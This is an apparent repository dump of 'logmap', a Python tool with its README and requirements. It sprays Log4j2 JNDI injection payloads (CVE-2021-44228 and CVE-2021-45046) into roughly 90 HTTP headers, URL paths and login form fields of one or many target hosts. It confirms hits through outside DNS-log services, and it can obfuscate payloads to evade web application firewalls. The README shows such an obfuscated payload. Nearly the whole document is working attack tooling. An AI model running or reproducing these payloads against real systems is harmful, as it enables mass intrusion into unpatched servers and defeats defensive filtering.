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/logmap.py:
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1 | #!/usr/bin/env python3
2 | # -*- coding: utf-8 -*-
3 | # __
4 | # / / ___ ___ ___ _ ___ ____
5 | # / /__/ _ \/ _ `/ ' \/ _ `/ _ \
6 | # /____/\___/\_, /_/_/_/\_,_/ .__/
7 | # /___/ /_/
8 | #
9 | # from https://github.com/zhzyker/logmap
10 | # Log4j2 jndi injection fuzz tool
11 | import sys
12 | import time
13 | import json
14 | import socket
15 | import random
16 | import string
17 | import hashlib
18 | import requests
19 | import argparse
20 | import textwrap
21 | import socks
22 | import urllib3
23 | import platform
24 | import threading
25 | from random import getrandbits
26 | from urllib.parse import urlparse
27 |
28 | urllib3.disable_warnings()
29 |
30 |
31 | def logger(log="green", text=""):
32 | if platform.system().lower() == 'windows':
33 | print(text)
34 | else:
35 | if log == "green":
36 | print("\033[92m{}\033[0m".format(text))
37 | if log == "green_b":
38 | print("\033[1;92m{}\033[0m".format(text))
39 | if log == "red":
40 | print("\033[91m{}\033[0m".format(text))
41 | if log == "white":
42 | print("\033[37m{}\033[0m".format(text))
43 | if log == "yellow":
44 | print("\033[33m{}\033[0m".format(text))
45 | if log == "blue":
46 | print("\033[34m{}\033[0m".format(text))
47 | if log == "banner":
48 | print("\033[1;36m{}\033[0m".format(text))
49 |
50 |
51 | def banners():
52 | logger("banner", """ __
53 | / / ___ ___ ___ _ ___ ____
54 | / /__/ _ \/ _ `/ ' \/ _ `/ _ \\
55 | /____/\___/\_, /_/_/_/\_,_/ .__/
56 | /___/ /_/ \n""")
57 |
58 |
59 | def random_md5():
60 | st = ''.join(random.choices(string.ascii_letters + string.digits, k=8))
61 | md = hashlib.md5("".join(st).encode('utf-8')).hexdigest()
62 | return str(md)
63 |
64 |
65 | def random_str(i=6):
66 | return ''.join(random.choices(string.ascii_letters + string.digits, k=i))
67 |
68 |
69 | def arg():
70 | parser = argparse.ArgumentParser(usage="python3 logmap.py [options]", add_help=False)
71 | gen = parser.add_argument_group("Help", "How to use")
72 | gen.add_argument("-u", "--url", dest="url", type=str, help=" Target URL (e.g. http://example.com )")
73 | gen.add_argument("-f", "--file", dest="file", help="Select a target list file (e.g. list.txt )")
74 | gen.add_argument("-c", "--cve", dest="cve", metavar="1", type=int, default=1,
75 | help="CVE [1:CVE-2021-44228, 2:CVE-2021-45046] default 1")
76 | gen.add_argument("-d", "--dns", dest="dns", metavar="1", type=int, default=1,
77 | help="Dnslog [1:log.xn--9tr.com, 2:ceye.io] default 1")
78 | gen.add_argument("-p", dest="payload", help="Custom payload (e.g. ${jndi:ldap://xx.dns.xx/} ) ")
79 | gen.add_argument("-t", dest="timeout", metavar="20", default=20, help="Http timeout default 20s")
80 | gen.add_argument("-o", dest="output", metavar="file", help="Output file")
81 | gen.add_argument("-w", "--waf", dest="waf", action='store_true', help="Obfuscate the payload and bypass waf")
82 | gen.add_argument("--proxy", dest="proxy", help="Proxy [socks5/socks4/http] (e.g. http://127.0.0.1:8080)")
83 | gen.add_argument("-h", "--help", action="help", help="Show this help message and exit")
84 | return parser.parse_args()
85 |
86 |
87 | def print_roundtrip(response, *args, **kwargs):
88 | format_headers = lambda d: '\n'.join(f'{k}: {v}' for k, v in d.items())
89 | if response.request.body == None:
90 | return textwrap.dedent('''
91 | ********************** request **********************
92 |
93 | {req.method} {req.url}
94 | {reqhdrs}
95 |
96 | *****************************************************
97 | ''').format(
98 | req=response.request,
99 | res=response,
100 | reqhdrs=format_headers(response.request.headers),
101 | reshdrs=format_headers(response.headers),
102 | )
103 | return textwrap.dedent('''
104 | ********************** request **********************
105 |
106 | {req.method} {req.url}
107 | {reqhdrs}
108 |
109 | {req.body}
110 |
111 | *****************************************************
112 | ''').format(
113 | req=response.request,
114 | res=response,
115 | reqhdrs=format_headers(response.request.headers),
116 | reshdrs=format_headers(response.headers),
117 | )
118 |
119 |
120 | def confuse_chars(char):
121 | """
122 | Reference: https://github.com/woodpecker-appstore/log4j-payload-generator/blob/master/src/main/java/me/gv7/woodpekcer/vuldb/StringObfuscator2.java
123 | by https://github.com/c0ny1
124 | """
125 | garbageCount = random.randint(1, 5)
126 | i = 0
127 | garbage = ''
128 | lst = []
129 | while i < garbageCount:
130 | garbageLength = random.randint(1, 6)
131 | garbageWord = random_str(garbageLength)
132 | i += 1
133 | lst.append(garbageWord)
134 | lst.append(":")
135 | garbage = ''.join(lst)
136 | return "${{{0}-{1}}}".format(garbage, char)
137 |
138 |
139 | def confuse_payload(chars):
140 | """
141 | Reference: https://github.com/woodpecker-appstore/log4j-payload-generator/blob/master/src/main/java/me/gv7/woodpekcer/vuldb/StringObfuscator2.java
142 | by https://github.com/c0ny1
143 | """
144 | lst = []
145 | for char in chars:
146 | use = not getrandbits(1)
147 | if char == "$" or char == "{" or char == "}" or char == "#":
148 | use = False
149 | if use:
150 | lst.append(confuse_chars(char))
151 | else:
152 | lst.append(char)
153 | return ''.join([str(s) for s in lst])
154 |
155 |
156 | def fuzz_headers(threads, lock, target, domain, timeout, headers, result_md5_req, md5, key, value):
157 | dns_domain = md5 + "." + domain
158 | value = value.replace("DNS_LOG_DOMAIN", dns_domain)
159 | if args.waf:
160 | value = confuse_payload(value)
161 | headers = {
162 | "Content-Type": "application/x-www-form-urlencoded",
163 | "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36",
164 | key: value
165 | }
166 | try:
167 | logger("green", "[*] Fuzz headers: {}".format(key))
168 | req = requests.get(target, timeout=timeout, headers=headers, verify=False)
169 | result_md5_req[md5] = print_roundtrip(req)
170 | except:
171 | logger("green_b", "[?] Fuzz headers: {} abnormal".format(key))
172 | result_md5_req[md5] = "********************** payload **********************\n\n" \
173 | "{}: {}\n\n" \
174 | "*****************************************************".format(key, value)
175 |
176 |
177 | def fuzz_path(threads, lock, target, domain, timeout, headers, result_md5_req, md5, key_path, value_path):
178 | dns_domain = md5 + "." + domain
179 | value_path = value_path.replace("DNS_LOG_DOMAIN", dns_domain)
180 | if args.waf:
181 | value_path = confuse_payload(value_path)
182 | path_p = key_path + value_path
183 | try:
184 | logger("green", "[*] Fuzz url path: {}".format(path_p))
185 | req = requests.get(target + path_p, timeout=timeout, headers=headers, verify=False)
186 | result_md5_req[md5] = print_roundtrip(req)
187 | except:
188 | result_md5_req[md5] = "********************** payload **********************\n\n" \
189 | "{}\n\n" \
190 | "*****************************************************".format(path_p)
191 | logger("green_b", "[?] Fuzz url path: {} abnormal".format(path_p))
192 | result_md5_req[md5] = "payload: {}".format(path_p)
193 |
194 |
195 | def fuzz_body(threads, lock, target, domain, timeout, headers, result_md5_req, md5, key_body, payload):
196 | dns_domain = md5 + "." + domain
197 | payload_body = payload.replace("DNS_LOG_DOMAIN", dns_domain)
198 | if args.waf:
199 | payload_body = confuse_payload(key_body.replace("DNS_LOG_DOMAIN", dns_domain))
200 | body = key_body.replace("RE_PAYLOAD", payload_body)
201 | try:
202 | logger("green", "[*] Fuzz body: {}".format(body))
203 | req = requests.post(target, data=body, timeout=timeout, headers=headers, verify=False)
204 | result_md5_req[md5] = print_roundtrip(req)
205 | except:
206 | logger("green_b", "[?] Fuzz body: {} abnormal".format(body))
207 | result_md5_req[md5] = "********************** payload **********************\n\n" \
208 | "{}\n\n" \
209 | "*****************************************************".format(body)
210 |
211 |
212 | def run_fuzz(target, payload, timeout, domain, token):
213 | lock = threading.Lock()
214 | path_payload_list = {
215 | "": "",
216 | "/hello": payload,
217 | "?id=": payload,
218 | "?username=": payload,
219 | "?page=": payload,
220 | }
221 | headers= {
222 | "Content-Type": "application/x-www-form-urlencoded",
223 | "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"
224 | }
225 | headers_payload_lists = {
226 | "Accept": payload,
227 | "Accept-Charset": payload,
228 | "Accept-Datetime": payload,
229 | "Accept-Encoding": payload,
230 | "Accept-Language": payload,
231 | "Ali-CDN-Real-IP": payload,
232 | "Authorization": payload,
233 | "Cache-Control": payload,
234 | "Cdn-Real-Ip": payload,
235 | "Cdn-Src-Ip": payload,
236 | "CF-Connecting-IP": payload,
237 | "Client-IP": payload,
238 | "Contact": payload,
239 | "Cookie": payload,
240 | "DNT": payload,
241 | "Fastly-Client-Ip": payload,
242 | "Forwarded-For-Ip": payload,
243 | "Forwarded-For": payload,
244 | "Forwarded": payload,
245 | "Forwarded-Proto": payload,
246 | "From": payload,
247 | "If-Modified-Since": payload,
248 | "Max-Forwards": payload,
249 | "Originating-Ip": payload,
250 | "Origin": payload,
251 | "Pragma": payload,
252 | "Proxy-Client-IP": payload,
253 | "Proxy": payload,
254 | "Referer": payload,
255 | "TE": payload,
256 | "True-Client-Ip": payload,
257 | "True-Client-IP": payload,
258 | "Upgrade": payload,
259 | "User-Agent": payload,
260 | "Via": payload,
261 | "Warning": payload,
262 | "WL-Proxy-Client-IP": payload,
263 | "X-Api-Version": payload,
264 | "X-ATT-DeviceId": payload,
265 | "X-Client-IP": payload,
266 | "X-Cluster-Client-IP": payload,
267 | "X-Correlation-ID": payload,
268 | "X-Csrf-Token": payload,
269 | "X-CSRFToken": payload,
270 | "X-Do-Not-Track": payload,
271 | "X-Foo-Bar": payload,
272 | "X-Foo": payload,
273 | "X-Forwarded-By": payload,
274 | "X-Forwarded-For-Original": payload,
275 | "X-Forwarded-For": payload,
276 | "X-Forwarded-Host": payload,
277 | "X-Forwarded": payload,
278 | "X-Forwarded-Port": payload,
279 | "X-Forwarded-Protocol": payload,
280 | "X-Forwarded-Proto": payload,
281 | "X-Forwarded-Scheme": payload,
282 | "X-Forwarded-Server": payload,
283 | "X-Forwarded-Ssl": payload,
284 | "X-Forwarder-For": payload,
285 | "X-Forward-For": payload,
286 | "X-Forward-Proto": payload,
287 | "X-Frame-Options": payload,
288 | "X-From": payload,
289 | "X-Geoip-Country": payload,
290 | "X-Host": payload,
291 | "X-Http-Destinationurl": payload,
292 | "X-Http-Host-Override": payload,
293 | "X-Http-Method-Override": payload,
294 | "X-HTTP-Method-Override": payload,
295 | "X-Http-Method": payload,
296 | "X-Http-Path-Override": payload,
297 | "X-Https": payload,
298 | "X-Htx-Agent": payload,
299 | "X-Hub-Signature": payload,
300 | "X-If-Unmodified-Since": payload,
301 | "X-Imbo-Test-Config": payload,
302 | "X-Insight": payload,
303 | "X-Ip": payload,
304 | "X-Ip-Trail": payload,
305 | "X-Leakix": payload,
306 | "X-Original-URL": payload,
307 | "X-Originating-IP": payload,
308 | "X-ProxyUser-Ip": payload,
309 | "X-Real-Ip": payload,
310 | "X-Remote-Addr": payload,
311 | "X-Remote-IP": payload,
312 | "X-Requested-With": payload,
313 | "X-Request-ID": payload,
314 | "X-True-IP": payload,
315 | "X-UIDH": payload,
316 | "X-Wap-Profile": payload,
317 | "X-WAP-Profile": payload,
318 | "X-XSRF-TOKEN": payload,
319 | }
320 | body_payload_lists = [
321 | 'payload=RE_PAYLOAD',
322 | 'user=RE_PAYLOAD',
323 | 'pass=RE_PAYLOAD',
324 | 'username=RE_PAYLOAD',
325 | 'password=RE_PAYLOAD',
326 | 'login=RE_PAYLOAD',
327 | 'email=RE_PAYLOAD',
328 | 'principal=RE_PAYLOAD',
329 | 'token=RE_PAYLOAD',
330 | 'verify=RE_PAYLOAD',
331 | 'dest=RE_PAYLOAD',
332 | 'login_username=RE_PAYLOAD',
333 | 'login_password=RE_PAYLOAD',
334 | 'authorization=RE_PAYLOAD',
335 | 'city=RE_PAYLOAD',
336 | 'user=RE_PAYLOAD&pass=RE_PAYLOAD',
337 | 'username=RE_PAYLOAD&password=RE_PAYLOAD',
338 | 'USERNAME=RE_PAYLOAD&PASSWORD=RE_PAYLOAD',
339 | 'j_username=RE_PAYLOAD&j_password=RE_PAYLOAD',
340 | ]
341 | result_md5_req = {}
342 | threads = []
343 | threads.append([threading.Thread(target=fuzz_headers, args=(threads, lock, target, domain, timeout, headers, result_md5_req, random_md5(), key, value)) for (key, value) in headers_payload_lists.items()])
344 | for (key_path, value_path) in path_payload_list.items():
345 | if key_path == "":
346 | threads.append([threading.Thread(target=fuzz_body, args=(threads, lock, target, domain, timeout, headers, result_md5_req, random_md5(), key_body, payload)) for key_body in body_payload_lists])
347 | threads.append(threading.Thread(target=fuzz_path, args=(threads, lock, target, domain, timeout, headers, result_md5_req, random_md5(), key_path, value_path)))
348 | i = 0
349 | for t in threads:
350 | i += 1
351 | if i == 3:
352 | break
353 | for o in t:
354 | o.start()
355 | for o in t:
356 | o.join()
357 |
358 | if args.payload:
359 | logger("yellow", "[*] Please check your dns")
360 | else:
361 | if dns_verify(args, target, result_md5_req, token):
362 | logger("green", "[+] Log4j2 fuzz end")
363 | else:
364 | logger("yellow", "[-] Not found Log4j2 vuln, fuzz end")
365 |
366 |
367 | def check_log4j2(args):
368 | if args.url == args.file:
369 | logger("red", "[!] Must specify -u or -f")
370 | sys.exit(0)
371 | dns_result = dnslog(args, type=args.dns)
372 | domain = dns_result[0]
373 | token = dns_result[1]
374 | timeout = args.timeout
375 | logger("yellow", "[*] Get domain: {} token: {}".format(domain, token))
376 | if args.payload:
377 | payload = args.payload
378 | elif args.cve == 1:
379 | payload = "${{jndi:ldap://{0}:443/{1}}}".format("DNS_LOG_DOMAIN", random_str())
380 | logger("yellow",
381 | "[+] Use CVE-2021-44228 paylaod: {}"
382 | .format(payload.replace("DNS_LOG_DOMAIN", "md5." + domain)))
383 | else:
384 | payload = "${{jndi:ldap://127.0.0.1#{0}:443/{1}}}".format("DNS_LOG_DOMAIN", random_str())
385 | logger("yellow",
386 | "[+] Use CVE-2021-45046 paylaod: {}"
387 | .format(payload.replace("DNS_LOG_DOMAIN", "md5." + domain)))
388 | if args.file:
389 | for line in open(args.file):
390 | line = line.strip()
391 | line = line.strip("\r\n")
392 | if "http" not in line:
393 | line = "http://" + line
394 | if line == "":
395 | continue
396 | logger("yellow", "[+] Check target: {}".format(line))
397 | if not line:
398 | break
399 | run_fuzz(line, payload, timeout, domain, token)
400 | else:
401 | if "http" not in args.url:
402 | args.url = "http://" + args.url
403 | run_fuzz(args.url, payload, timeout, domain, token)
404 |
405 |
406 | def dns_verify(args, target, result_md5_req, token):
407 | logger("yellow", "[*] Get dnslog results")
408 | dnslog_result = dnslog(args, type=args.dns, function="verify", token=token)
409 | i = 0
410 | for (key, value) in result_md5_req.items():
411 | if key in dnslog_result:
412 | logger("red", "[+] Found the Log4j2 vulnerability, Md5 is: {}".format(key))
413 | logger("white", value)
414 | if args.output:
415 | with open(args.output, 'a') as output_file:
416 | output_file.write("{}\r\n{}\r\n".format(target, value))
417 | i += 1
418 | if i != 0:
419 | return True
420 | return False
421 |
422 |
423 | def dnslog(args, type=1, function="get", token="", md5=""):
424 | if type == 1:
425 | if function == "get":
426 | try:
427 | request = requests.get("https://log.xn--9tr.com/new_gen", verify=False, headers={
428 | "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"})
429 | domain = json.loads(request.text)["domain"]
430 | key = json.loads(request.text)["key"]
431 | token = json.loads(request.text)["token"]
432 | result = [domain, token]
433 | return result
434 | except:
435 | logger("red", "[-] https://log.xn--9tr.com/new_gen Request failed")
436 | elif function == "verify":
437 | try:
438 | time.sleep(2)
439 | request = requests.get("https://log.xn--9tr.com/" + token, verify=False)
440 | return request.text
441 | except:
442 | logger("red", "[-] https://log.xn--9tr.com/{} Request failed".format(token))
443 | return ""
444 | return ["null", "null"]
445 | elif type == 2:
446 | if function == "get":
447 | if "xxxxxx" in args.ceye[0]:
448 | logger("red", "[!] Need to set domain and token http://ceye.io")
449 | sys.exit(0)
450 | return args.ceye
451 | elif function == "verify":
452 | try:
453 | time.sleep(2)
454 | request = requests.get("http://api.ceye.io/v1/records?token={}&type=dns".format(args.ceye[1]))
455 | return request.text
456 | except:
457 | logger("red", "[-] http://api.ceye.io/v1/records?token={}&type=dns Request failed".format(args.ceye[1]))
458 | return ""
459 | return ["null", "null"]
460 |
461 |
462 | def proxy(args):
463 | if args.proxy:
464 | _url = urlparse(args.proxy)
465 | hostname = _url.hostname
466 | port = _url.port
467 | scheme = _url.scheme
468 | if "http" in scheme:
469 | socks.set_default_proxy(socks.HTTP, hostname, port)
470 | socket.socket = socks.socksocket
471 | elif "socks5" in scheme:
472 | socks.set_default_proxy(socks.SOCKS5, hostname, port)
473 | socket.socket = socks.socksocket
474 | elif "socks4" in scheme:
475 | socks.set_default_proxy(socks.SOCKS4, hostname, port)
476 | socket.socket = socks.socksocket
477 | logger("yellow", "[+] Use proxy {}".format(args.proxy))
478 |
479 |
480 | if __name__ == '__main__':
481 | banners()
482 | logger("blue", "[*] Log4j2 jndi injection fuzz tool")
483 | logger("blue", "[*] Version: 0.6")
484 | logger("blue", "[*] From https://github.com/zhzyker/logmap")
485 | args = arg()
486 | args.ceye = ["xxxxxx.ceye.io", "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"]
487 | proxy(args)
488 | check_log4j2(args)
489 |
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1 | # logmap 0.6 - Log4j jndi injection fuzz tool
2 |
3 | Used for fuzzing to test whether there are log4j2 jndi injection vulnerabilities in header/body/path
4 | Use https://log.xn--9tr.com dnslog by default, If you want to use http://ceye.io, you need to modify the domain and token
5 | Manually edit line [#486](https://github.com/zhzyker/logmap/blob/main/logmap.py#L486) in logmap.py to modify:
6 | `args.ceye = ["xxxxxx.ceye.io", "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"]`
7 | to
8 | `args.ceye = ["1234567.ceye.io", "843fd6d58a8ebede756a2b991d321a5a"]`
9 |
10 | The default payload is `${{jndi:ldap://you-domain/path}}` Use `-w` or `-waf` to obfuscate the payload to bypass waf, it looks like:
11 | `${${zod:as:-j}ndi:ldap:${MOH7P:-/}/${jUqr1:dlhUT:zX:Mu:rXx:-9}b71${6r3c:E8ExQh:a:iqML:-a}${jLR:s6xE:-7}${j:zzb:-3}d8${f:CF:DpXSA:-0}${7:2:yM:LnbSk:-1}c3199${4tPUvE:fj7:6K:xpqPQc:rCnYQB:-1}${G:Q:SET9R:u:9t0cc1:-1}${cLF:kENZON:e:p6f:-9}${y:i:abgu0:2cb:-3}6${35aUvK:40sxe:PaVK:cR:-d}${ysVe:byc:e:5nvP:9yVRko:-3}${Cm:DLU:-c}3f0b${iiuZKY:taWD:-4}${B:VK3:3BWv:L:-4}${KA6:GX:xxVWZg:-3}5.${6E50:-f}${iNN4:Ol:XLrqD:-3}${3Fh:T6:-6}e4${IAyoy:-d}${hMZgt:bmBCp9:bY6ofD:KR:-e}${6Ny3E:-b}.${K:Q:-d}n${FLlWGk:-s}.14${8M:-3}${W0u:LA5Z:N:-3}${t5FH:-.}e${GL:x0L72g:bqf9:6:pRQp:-u}${VIq:V:-.}${r:zFcvb:7hqmx:HTGO8:-o}r${n1ZHSo:w:-g}./Efti${Q3:-G}1}`
12 | Bypass reference: [StringObfuscator2.java](https://github.com/woodpecker-appstore/log4j-payload-generator/blob/master/src/main/java/me/gv7/woodpekcer/vuldb/StringObfuscator2.java) by https://github.com/c0ny1
13 |
14 | Use `-c 1` or `--cve 1` to specify the payload, support: [1:CVE-2021-44228, 2:CVE-2021-45046]
15 |
16 | This is just a jndi injection fuzz tool, rce or others need yourself
17 |
18 | # Use
19 | ```bash
20 | zhzy@debian:~/$ pip3 install -r requirements.txt
21 | zhzy@debian:~/$ python3 logmap.py -h
22 | ```
23 |
24 |
25 | 
26 |
27 | # Options
28 | ```bash
29 | -u URL, --url URL Target URL (e.g. http://example.com )
30 | -f FILE, --file FILE Select a target list file (e.g. list.txt )
31 | -c 1, --cve 1 CVE [1:CVE-2021-44228, 2:CVE-2021-45046] default 1
32 | -d 1, --dns 1 Dnslog [1:log.xn--9tr.com, 2:ceye.io] default 1
33 | -p PAYLOAD Custom payload (e.g. ${jndi:ldap://xx.dns.xx/} )
34 | -t 10 Http timeout default 10s
35 | -o file Output file
36 | -w, --waf Obfuscate the payload and bypass waf
37 | --proxy PROXY Proxy [socks5/socks4/http] (e.g. http://127.0.0.1:8080)
38 | -h, --help Show this help message and exit
39 | ```
40 |
41 | # Config
42 | There are currently 93 fuzz headers
43 | ```
44 | Accept
45 | Accept-Charset
46 | Accept-Datetime
47 | Accept-Encoding
48 | Accept-Language
49 | Ali-CDN-Real-IP
50 | Authorization
51 | Cache-Control
52 | Cdn-Real-Ip
53 | Cdn-Src-Ip
54 | CF-Connecting-IP
55 | Client-IP
56 | Contact
57 | Cookie
58 | DNT
59 | Fastly-Client-Ip
60 | Forwarded-For-Ip
61 | Forwarded-For
62 | Forwarded
63 | Forwarded-Proto
64 | From
65 | If-Modified-Since
66 | Max-Forwards
67 | Originating-Ip
68 | Origin
69 | Pragma
70 | Proxy-Client-IP
71 | Proxy
72 | Referer
73 | TE
74 | True-Client-Ip
75 | True-Client-IP
76 | Upgrade
77 | User-Agent
78 | Via
79 | Warning
80 | WL-Proxy-Client-IP
81 | X-Api-Version
82 | X-ATT-DeviceId
83 | X-Client-IP
84 | X-Cluster-Client-IP
85 | X-Correlation-ID
86 | X-Csrf-Token
87 | X-CSRFToken
88 | X-Do-Not-Track
89 | X-Foo-Bar
90 | X-Foo
91 | X-Forwarded-By
92 | X-Forwarded-For-Original
93 | X-Forwarded-For
94 | X-Forwarded-Host
95 | X-Forwarded
96 | X-Forwarded-Port
97 | X-Forwarded-Protocol
98 | X-Forwarded-Proto
99 | X-Forwarded-Scheme
100 | X-Forwarded-Server
101 | X-Forwarded-Ssl
102 | X-Forwarder-For
103 | X-Forward-For
104 | X-Forward-Proto
105 | X-Frame-Options
106 | X-From
107 | X-Geoip-Country
108 | X-Host
109 | X-Http-Destinationurl
110 | X-Http-Host-Override
111 | X-Http-Method-Override
112 | X-HTTP-Method-Override
113 | X-Http-Method
114 | X-Http-Path-Override
115 | X-Https
116 | X-Htx-Agent
117 | X-Hub-Signature
118 | X-If-Unmodified-Since
119 | X-Imbo-Test-Config
120 | X-Insight
121 | X-Ip
122 | X-Ip-Trail
123 | X-Leakix
124 | X-Original-URL
125 | X-Originating-IP
126 | X-ProxyUser-Ip
127 | X-Real-Ip
128 | X-Remote-Addr
129 | X-Remote-IP
130 | X-Requested-With
131 | X-Request-ID
132 | X-True-IP
133 | X-UIDH
134 | X-Wap-Profile
135 | X-WAP-Profile
136 | X-XSRF-TOKEN
137 | ```
138 | Some body and path
139 | You can also modify him to add your own body
140 | ```
141 | payload={}
142 | user={}
143 | pass={}
144 | username={}
145 | password={}
146 | login={}
147 | ... ...
148 | ?id={}
149 | ?username={}
150 | ... ...
151 | ```
152 |
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/requirements.txt:
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1 | urllib3
2 | requests
3 | PySocks
4 |
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